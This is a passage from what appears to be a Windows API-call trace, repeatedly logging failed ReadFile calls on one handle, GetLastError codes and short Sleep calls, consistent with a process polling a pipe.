	[0233.129] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.129] GetLastError () returned 0x218
	[0233.129] Sleep (dwMilliseconds=0xa) 
	[0233.144] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.144] GetLastError () returned 0x218
	[0233.144] Sleep (dwMilliseconds=0xa) 
	[0233.160] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.160] GetLastError () returned 0x218
	[0233.160] Sleep (dwMilliseconds=0xa) 
	[0233.175] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.175] GetLastError () returned 0x218
	[0233.175] Sleep (dwMilliseconds=0xa) 
	[0233.195] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.195] GetLastError () returned 0x218
	[0233.195] Sleep (dwMilliseconds=0xa) 
	[0233.237] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.237] GetLastError () returned 0x218
	[0233.238] Sleep (dwMilliseconds=0xa) 
	[0233.283] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.283] GetLastError () returned 0x218
	[0233.283] Sleep (dwMilliseconds=0xa) 
	[0233.366] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0233.366] GetLastError () returned 0x218
	[0233.366] Sleep (dwMilliseconds=0x3e8) 
	[0234.386] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0234.386] Sleep (dwMilliseconds=0xa) 
	[0234.400] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.400] GetLastError () returned 0x218
	[0234.400] Sleep (dwMilliseconds=0xa) 
	[0234.407] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.407] GetLastError () returned 0x218
	[0234.407] Sleep (dwMilliseconds=0xa) 
	[0234.423] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.423] GetLastError () returned 0x218
	[0234.423] Sleep (dwMilliseconds=0xa) 
	[0234.438] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.438] GetLastError () returned 0x218
	[0234.438] Sleep (dwMilliseconds=0xa) 
	[0234.459] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.460] GetLastError () returned 0x218
	[0234.460] Sleep (dwMilliseconds=0xa) 
	[0234.471] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.471] GetLastError () returned 0x218
	[0234.471] Sleep (dwMilliseconds=0xa) 
	[0234.487] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.487] GetLastError () returned 0x218
	[0234.487] Sleep (dwMilliseconds=0xa) 
	[0234.607] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.607] GetLastError () returned 0x218
	[0234.607] Sleep (dwMilliseconds=0xa) 
	[0234.674] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.674] GetLastError () returned 0x218
	[0234.674] Sleep (dwMilliseconds=0xa) 
	[0234.750] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.750] GetLastError () returned 0x218
	[0234.750] Sleep (dwMilliseconds=0xa) 
	[0234.777] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.777] GetLastError () returned 0x218
	[0234.777] Sleep (dwMilliseconds=0xa) 
	[0234.820] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.820] GetLastError () returned 0x218
	[0234.820] Sleep (dwMilliseconds=0xa) 
	[0234.828] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.828] GetLastError () returned 0x218
	[0234.828] Sleep (dwMilliseconds=0xa) 
	[0234.848] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.848] GetLastError () returned 0x218
	[0234.848] Sleep (dwMilliseconds=0xa) 
	[0234.859] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.859] GetLastError () returned 0x218
	[0234.859] Sleep (dwMilliseconds=0xa) 
	[0234.903] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.903] GetLastError () returned 0x218
	[0234.903] Sleep (dwMilliseconds=0xa) 
	[0234.947] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.947] GetLastError () returned 0x218
	[0234.947] Sleep (dwMilliseconds=0xa) 
	[0234.984] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0234.984] GetLastError () returned 0x218
	[0234.985] Sleep (dwMilliseconds=0xa) 
	[0235.030] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.030] GetLastError () returned 0x218
	[0235.030] Sleep (dwMilliseconds=0xa) 
	[0235.048] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.048] GetLastError () returned 0x218
	[0235.048] Sleep (dwMilliseconds=0xa) 
	[0235.062] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.062] GetLastError () returned 0x218
	[0235.062] Sleep (dwMilliseconds=0xa) 
	[0235.094] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.094] GetLastError () returned 0x218
	[0235.094] Sleep (dwMilliseconds=0xa) 
	[0235.109] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.109] GetLastError () returned 0x218
	[0235.109] Sleep (dwMilliseconds=0xa) 
	[0235.124] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.124] GetLastError () returned 0x218
	[0235.124] Sleep (dwMilliseconds=0xa) 
	[0235.141] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.141] GetLastError () returned 0x218
	[0235.142] Sleep (dwMilliseconds=0xa) 
	[0235.188] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.188] GetLastError () returned 0x218
	[0235.188] Sleep (dwMilliseconds=0xa) 
	[0235.266] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.266] GetLastError () returned 0x218
	[0235.266] Sleep (dwMilliseconds=0xa) 
	[0235.317] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.317] GetLastError () returned 0x218
	[0235.317] Sleep (dwMilliseconds=0xa) 
	[0235.327] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.327] GetLastError () returned 0x218
	[0235.327] Sleep (dwMilliseconds=0xa) 
	[0235.343] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.343] GetLastError () returned 0x218
	[0235.343] Sleep (dwMilliseconds=0xa) 
	[0235.358] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.358] GetLastError () returned 0x218
	[0235.359] Sleep (dwMilliseconds=0xa) 
	[0235.374] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.375] GetLastError () returned 0x218
	[0235.375] Sleep (dwMilliseconds=0xa) 
	[0235.390] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.390] GetLastError () returned 0x218
	[0235.390] Sleep (dwMilliseconds=0xa) 
	[0235.406] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.406] GetLastError () returned 0x218
	[0235.406] Sleep (dwMilliseconds=0xa) 
	[0235.421] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.421] GetLastError () returned 0x218
	[0235.421] Sleep (dwMilliseconds=0xa) 
	[0235.468] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.468] GetLastError () returned 0x218
	[0235.468] Sleep (dwMilliseconds=0xa) 
	[0235.515] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.515] GetLastError () returned 0x218
	[0235.515] Sleep (dwMilliseconds=0xa) 
	[0235.561] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.561] GetLastError () returned 0x218
	[0235.561] Sleep (dwMilliseconds=0xa) 
	[0235.577] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.577] GetLastError () returned 0x218
	[0235.577] Sleep (dwMilliseconds=0xa) 
	[0235.593] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.593] GetLastError () returned 0x218
	[0235.593] Sleep (dwMilliseconds=0xa) 
	[0235.608] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.608] GetLastError () returned 0x218
	[0235.609] Sleep (dwMilliseconds=0xa) 
	[0235.624] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0235.624] GetLastError () returned 0x218
	[0235.625] Sleep (dwMilliseconds=0xa) 
	[0236.004] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.004] GetLastError () returned 0x218
	[0236.004] Sleep (dwMilliseconds=0xa) 
	[0236.045] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.045] GetLastError () returned 0x218
	[0236.045] Sleep (dwMilliseconds=0xa) 
	[0236.095] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.095] GetLastError () returned 0x218
	[0236.095] Sleep (dwMilliseconds=0xa) 
	[0236.138] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.138] GetLastError () returned 0x218
	[0236.138] Sleep (dwMilliseconds=0xa) 
	[0236.156] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.156] GetLastError () returned 0x218
	[0236.157] Sleep (dwMilliseconds=0xa) 
	[0236.228] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.229] GetLastError () returned 0x218
	[0236.229] Sleep (dwMilliseconds=0xa) 
	[0236.268] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.268] GetLastError () returned 0x218
	[0236.268] Sleep (dwMilliseconds=0xa) 
	[0236.310] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.310] GetLastError () returned 0x218
	[0236.310] Sleep (dwMilliseconds=0xa) 
	[0236.357] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.357] GetLastError () returned 0x218
	[0236.357] Sleep (dwMilliseconds=0xa) 
	[0236.404] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.404] GetLastError () returned 0x218
	[0236.404] Sleep (dwMilliseconds=0xa) 
	[0236.419] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.419] GetLastError () returned 0x218
	[0236.419] Sleep (dwMilliseconds=0xa) 
	[0236.435] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.436] GetLastError () returned 0x218
	[0236.436] Sleep (dwMilliseconds=0xa) 
	[0236.450] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.450] GetLastError () returned 0x218
	[0236.450] Sleep (dwMilliseconds=0xa) 
	[0236.466] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.467] GetLastError () returned 0x218
	[0236.467] Sleep (dwMilliseconds=0xa) 
	[0236.482] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.482] GetLastError () returned 0x218
	[0236.482] Sleep (dwMilliseconds=0xa) 
	[0236.497] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.497] GetLastError () returned 0x218
	[0236.497] Sleep (dwMilliseconds=0xa) 
	[0236.512] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.512] GetLastError () returned 0x218
	[0236.513] Sleep (dwMilliseconds=0xa) 
	[0236.560] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.560] GetLastError () returned 0x218
	[0236.560] Sleep (dwMilliseconds=0xa) 
	[0236.606] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.606] GetLastError () returned 0x218
	[0236.606] Sleep (dwMilliseconds=0xa) 
	[0236.650] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.650] GetLastError () returned 0x218
	[0236.650] Sleep (dwMilliseconds=0xa) 
	[0236.653] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.653] GetLastError () returned 0x218
	[0236.653] Sleep (dwMilliseconds=0xa) 
	[0236.669] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.669] GetLastError () returned 0x218
	[0236.669] Sleep (dwMilliseconds=0xa) 
	[0236.684] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.684] GetLastError () returned 0x218
	[0236.684] Sleep (dwMilliseconds=0xa) 
	[0236.700] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.700] GetLastError () returned 0x218
	[0236.700] Sleep (dwMilliseconds=0xa) 
	[0236.716] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.716] GetLastError () returned 0x218
	[0236.716] Sleep (dwMilliseconds=0xa) 
	[0236.732] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.732] GetLastError () returned 0x218
	[0236.732] Sleep (dwMilliseconds=0xa) 
	[0236.747] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.747] GetLastError () returned 0x218
	[0236.747] Sleep (dwMilliseconds=0xa) 
	[0236.794] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.794] GetLastError () returned 0x218
	[0236.794] Sleep (dwMilliseconds=0xa) 
	[0236.834] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0236.834] GetLastError () returned 0x218
